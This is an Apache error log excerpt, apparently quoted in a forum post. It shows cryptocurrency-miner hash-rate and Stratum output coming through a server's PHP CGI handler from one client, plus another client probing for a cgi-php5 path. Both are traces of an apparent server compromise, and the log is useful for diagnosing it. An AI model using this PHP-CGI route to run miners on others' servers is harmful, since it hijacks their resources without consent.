[Fri Nov 22 00:44:39 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:39] thread 0: 4096 hashes, 3.19 khash/s
[Fri Nov 22 00:44:40 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:40] thread 2: 4096 hashes, 3.31 khash/s
[Fri Nov 22 00:44:40 2013] [error] [client 50.116.50.35] [2013-11-22 00:44:40] thread 1: 4096 hashes, 1.46 khash/s
[Fri Nov 22 00:45:26 2013] [error] [client 50.116.50.35] [2013-11-22 00:45:26] thread 1: 87412 hashes, 1.92 khash/s
[Fri Nov 22 00:46:22 2013] [error] [client 50.116.50.35] [2013-11-22 00:46:22] thread 1: 115424 hashes, 2.04 khash/s
[Fri Nov 22 00:46:24 2013] [error] [client 50.116.50.35] [2013-11-22 00:46:24] thread 0: 191392 hashes, 1.82 khash/s
[Fri Nov 22 00:46:34 2013] [error] [client 50.116.50.35] [2013-11-22 00:46:34] thread 2: 198628 hashes, 1.74 khash/s
[Fri Nov 22 00:46:34 2013] [error] [client 50.116.50.35] [2013-11-22 00:46:34] thread 3: 224940 hashes, 1.94 khash/s
[Fri Nov 22 00:47:23 2013] [error] [client 50.116.50.35] [2013-11-22 00:47:23] thread 1: 122500 hashes, 2.02 khash/s
[Fri Nov 22 00:47:23 2013] [error] [client 50.116.50.35] [2013-11-22 00:47:23] thread 0: 109444 hashes, 1.83 khash/s
[Fri Nov 22 00:47:32 2013] [error] [client 50.116.50.35] [2013-11-22 00:47:32] thread 3: 116544 hashes, 2.01 khash/s
[Fri Nov 22 00:47:36 2013] [error] [client 50.116.50.35] [2013-11-22 00:47:36] thread 2: 104572 hashes, 1.67 khash/s
[Fri Nov 22 00:48:24 2013] [error] [client 50.116.50.35] [2013-11-22 00:48:24] thread 1: 121104 hashes, 1.99 khash/s
[Fri Nov 22 00:48:24 2013] [error] [client 50.116.50.35] [2013-11-22 00:48:24] thread 0: 109620 hashes, 1.81 khash/s
[Fri Nov 22 00:48:31 2013] [error] [client 50.116.50.35] [2013-11-22 00:48:31] thread 3: 120544 hashes, 2.06 khash/s
[Fri Nov 22 00:48:38 2013] [error] [client 50.116.50.35] [2013-11-22 00:48:38] thread 2: 100212 hashes, 1.61 khash/s
[Fri Nov 22 00:48:51 2013] [error] [client 94.102.56.237] File does not exist: /var/www/cgi-php5
[Fri Nov 22 00:49:20 2013] [error] [client 50.116.50.35] [2013-11-22 00:49:20] thread 1: 119460 hashes, 2.13 khash/s
[Fri Nov 22 00:49:23 2013] [error] [client 50.116.50.35] [2013-11-22 00:49:23] thread 0: 108540 hashes, 1.84 khash/s
[Fri Nov 22 00:49:26 2013] [warn] [client 50.116.50.35] Timeout waiting for output from CGI script /usr/lib/cgi-bin/php
[Fri Nov 22 00:49:26 2013] [error] [client 50.116.50.35] Script timed out before returning headers: php
[Fri Nov 22 00:49:35 2013] [error] [client 50.116.50.35] [2013-11-22 00:49:35] thread 3: 123396 hashes, 1.93 khash/s
[Fri Nov 22 00:49:35 2013] [error] [client 50.116.50.35] [2013-11-22 00:49:35] thread 2: 96888 hashes, 1.71 khash/s
[Fri Nov 22 00:50:19 2013] [error] [client 50.116.50.35] [2013-11-22 00:50:19] thread 1: 127748 hashes, 2.16 khash/s
[Fri Nov 22 00:50:20 2013] [error] [client 50.116.50.35] [2013-11-22 00:50:20] thread 0: 110688 hashes, 1.94 khash/s
[Fri Nov 22 00:50:38 2013] [error] [client 50.116.50.35] [2013-11-22 00:50:38] thread 3: 115972 hashes, 1.83 khash/s
[Fri Nov 22 00:50:40 2013] [error] [client 50.116.50.35] [2013-11-22 00:50:40] thread 2: 102696 hashes, 1.59 khash/s
[Fri Nov 22 00:50:45 2013] [error] [client 50.116.50.35] [2013-11-22 00:50:45] Stratum detected new block
[Fri Nov 22 01:21:11 2013] [error] [client 50.116.50.35] [2013-11-22 01:21:11] thread 1: 118740 hashes, 2.16 khash/s
[Fri Nov 22 01:21:22 2013] [error] [client 50.116.50.35] [2013-11-22 01:21:22] thread 0: 111680 hashes, 1.67 khash/s
[Fri Nov 22 01:21:22 2013] [error] [client 50.116.50.35] [2013-11-22 01:21:22] thread 3: 119164 hashes, 1.95 khash/s
[Fri Nov 22 01:21:23 2013] [error] [client 50.116.50.35] [2013-11-22 01:21:23] thread 2: 104004 hashes, 1.76 khash/s
[/quote]